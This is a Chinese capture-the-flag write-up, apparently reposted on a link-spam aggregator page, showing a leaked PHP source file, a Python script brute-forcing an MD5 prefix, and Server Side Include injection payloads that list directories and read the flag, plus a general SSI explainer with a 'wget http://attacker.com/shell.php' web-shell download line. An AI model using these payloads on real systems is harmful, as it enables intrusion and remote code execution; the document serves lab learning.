当前位置: 首页 > wzjs >正文

深圳市住房和城乡建设厅网站昆山新意建设咨询有限公司网站

深圳市住房和城乡建设厅网站,昆山新意建设咨询有限公司网站,网页制作300字心得,信号增强器设置网站进入题目页面如下 尝试输入弱口令密码都显示错误 看题目是search&#xff0c;扫描一下根目录试试 /index.php.swp 得到源码 进行一下代码审计 <?php//开启输出缓冲&#xff0c;将所有的输出内容先保存到缓冲区&#xff0c;而不是直接输出到浏览器。ob_start();//定义一个…

进入题目页面如下

尝试输入弱口令密码都显示错误

看题目是search,扫描一下根目录试试

/index.php.swp

得到源码

进行一下代码审计

<?php//开启输出缓冲,将所有的输出内容先保存到缓冲区,而不是直接输出到浏览器。ob_start();//定义一个名为 get_hash 的函数,用于生成一个随机的哈希值。function get_hash(){//定义一个包含各种字符的字符串,用于生成随机字符。$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';//从 $chars 中随机选取 5 个字符并拼接成一个字符串。$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//生成一个基于当前时间戳的唯一标识符,并与随机字符串拼接。$content = uniqid().$random;//对拼接后的字符串进行 SHA - 1 哈希处理,并返回哈希值。return sha1($content); }//设置 HTTP 响应的 Content - Type 头,指定响应内容为 HTML 格式,字符编码为 UTF - 8。header("Content-Type: text/html;charset=utf-8");//检查 POST 请求中是否包含 'username' 参数,并且该参数的值不为空。if(isset($_POST['username']) and $_POST['username'] != '' ){//定义一个管理员密码哈希前缀。$admin = '6d0bc1';//对用户输入的密码进行 MD5 哈希处理,并截取前 6 位,与管理员密码哈希前缀进行比较。if ( $admin == substr(md5($_POST['password']),0,6)) {//如果密码验证通过,弹出一个包含欢迎信息的 JavaScript 警告框。echo "<script>alert('[+] Welcome to manage system')</script>";//生成一个随机的文件名,文件名为 'public/' 加上 get_hash 函数生成的哈希值,后缀为 '.shtml'。$file_shtml = "public/".get_hash().".shtml";//以写入模式打开文件,如果无法打开则输出错误信息并终止脚本。$shtml = fopen($file_shtml, "w") or die("Unable to open file!");//定义要写入文件的文本内容,包含用户输入的用户名。$text = '******<h1>Hello,'.$_POST['username'].'</h1>******';//将文本内容写入文件。fwrite($shtml,$text);//关闭文件。fclose($shtml);//输出错误信息。echo "[!] Header  error ...";} else {//如果密码验证失败,弹出一个包含失败信息的 JavaScript 警告框。echo "<script>alert('[!] Failed')</script>";}} else {***}***
?>

代码仅对用户输入的密码进行 MD5 哈希处理

并截取前 6 位与预设的哈希前缀进行比较

可以通过简单的暴力破解或彩虹表攻击来找到满足条件的密码


由于只需要匹配 MD5 哈希的前 6 位,可以编写脚本,尝试不同的密码组合,计算其 MD5 哈希值并截取前 6 位进行比较,直到找到满足条件的密码

或使用预先计算好的 MD5 哈希值和对应的明文密码的彩虹表,查找哈希值前 6 位为 6d0bc1 的密码


python脚本

import hashlibadmin_prefix = '6d0bc1'
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()+-'# 简单的暴力破解函数,生成不同长度的密码组合
def brute_force():import itertoolsfor length in range(1, 10):for combination in itertools.product(charset, repeat=length):password = ''.join(combination)md5_hash = hashlib.md5(password.encode()).hexdigest()if md5_hash[:6] == admin_prefix:return passwordpassword = brute_force()
if password:print(f"找到密码: {password}")
else:print("未找到密码")

可以用pycharm运行python代码,结果如下

RhPd

使用密码登录并用burp suite抓包

得到路径

访问试试

得到这个界面

构造payload,返回上一个目录

username=<!--#exec cmd="ls ../"-->&password=RhPd

再次登录抓包,得到新的URL

访问试试

发现flag_990c66bf85a09c664f0b6741840499b2目录

payload

username=<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->&password=RhPd

 

再次登录抓包

访问,最后得到flag


SSI远程命令执行漏洞

Thinking


SSI(Server Side Includes)远程命令执行漏洞 是一种利用服务器配置不当,通过注入恶意SSI指令实现任意命令执行的高危漏洞

漏洞原理

SSI工作机制
SSI允许在HTML文件中嵌入服务器端指令(如 <!--#exec cmd="命令" -->),服务器解析时会执行这些指令。

漏洞成因

Web服务器(如Apache)开启 Includes 或 IncludesNOEXEC 配置
用户输入未过滤直接输出到SSI可执行文件中
允许上传扩展名为 .shtml 的文件

漏洞利用步骤

1. 检测SSI支持

nmap -p 80 --script http-ssi <目标IP> # 检测响应头包含 "Server: Apache/2.4.x (Unix) mod_include/2.4" 等 curl -I http://target.com/page.shtml # 查看是否返回 "X-SSI: enabled"

2. 命令注入方式

反射型注入
当用户输入被嵌入到SSI文件时

<!-- 原始代码 --> <html> <body>Welcome, <!--#echo var="QUERY_STRING" --></body> </html> # 攻击payload: http://target.com/page.shtml?name=<!--#exec cmd="id" -->

存储型注入
上传恶意 .shtml 文件

<!-- 关键注入点 --> <!--#exec cmd="wget http://attacker.com/shell.php -O /var/www/html/shell.php" -->

 


文章转载自:

http://Ggu7meQ5.wLdtp.cn
http://nkZTfvtQ.wLdtp.cn
http://qsoZiGb2.wLdtp.cn
http://MZKbnSSU.wLdtp.cn
http://CteU1q2h.wLdtp.cn
http://HF0uMWcY.wLdtp.cn
http://eJ7ZaGtg.wLdtp.cn
http://WL6tWAyp.wLdtp.cn
http://dQubwsAB.wLdtp.cn
http://kjrRbUie.wLdtp.cn
http://ifn0SRRn.wLdtp.cn
http://yg7eGvVI.wLdtp.cn
http://1eAjsaFS.wLdtp.cn
http://qMfqO8mx.wLdtp.cn
http://GMKROCMY.wLdtp.cn
http://iAyXKH62.wLdtp.cn
http://AkZuVa1o.wLdtp.cn
http://U7dL8pV8.wLdtp.cn
http://gqBEZazI.wLdtp.cn
http://FC2Uj5hU.wLdtp.cn
http://B0DFjD64.wLdtp.cn
http://LI5kGvyk.wLdtp.cn
http://JXBCTBsC.wLdtp.cn
http://Vj224Z3Q.wLdtp.cn
http://Nvo5QClJ.wLdtp.cn
http://o1nX4PWu.wLdtp.cn
http://A2BHEHqS.wLdtp.cn
http://tfNWTka8.wLdtp.cn
http://DUIpjkVh.wLdtp.cn
http://DkGklczZ.wLdtp.cn
http://www.dtcms.com/wzjs/730916.html

相关文章:

  • 百度广州给做网站公司重庆工程建设信息查询
  • 做网站什么前端框架方便长治市住房保障和城乡建设管理局网站
  • 网站做备案到哪去环保网站模板代码
  • 网站建设考试重点商务网站如何推广
  • 高效网站建设与维护岗位职责医疗网站专题模板
  • 洛阳 网站建设公司网站建设名片设计
  • 北京工信部查网站备案网络营销方案规范
  • 重庆网站建设红旗河沟个人网站的设计师
  • 建站公司最新排名企业网站建设分析报告
  • 绍兴网站建设08kejiwordpress 调用接口
  • 婚庆公司网站php源码韩国购物网站模板
  • 男学网站开发成都十大装修品牌装修公司
  • 苏州做商城网站营销推广公司
  • 佛山中小企业网站建设app开发运营需要多少钱
  • 深圳住房与建设网站南京做网站建设搭建的公司
  • 企业门户网站建设网站建设公司小猫建站
  • 东莞便宜做网站网站推广模式
  • 石家庄个人谁做网站云岭先锋网站是哪家公司做的
  • 淄博网站开发找网泰wordpress win主机伪静态
  • 什么网站发布找做效果图的网站规划对网站建设起到
  • 一元购网站建设多少钱城阳网站建设
  • 淄博网站排名优化公司网站备案 视频
  • 网站建设俄语虚拟主机怎么建网站
  • 网站简繁转换代码东盟建设工程有限公司网站
  • 太原免费网站建设湖南百度推广开户
  • 同城可以做别人一样的门户网站吗专业营销型网站定制
  • 软件技术 网站建设教程怎么查工程项目信息
  • 网站建设竞品分析基于jsp的购物网站开发
  • 合肥做网站的公司有哪些湖南省第四工程公司官网
  • 推广赚钱方法南京做网站优化价格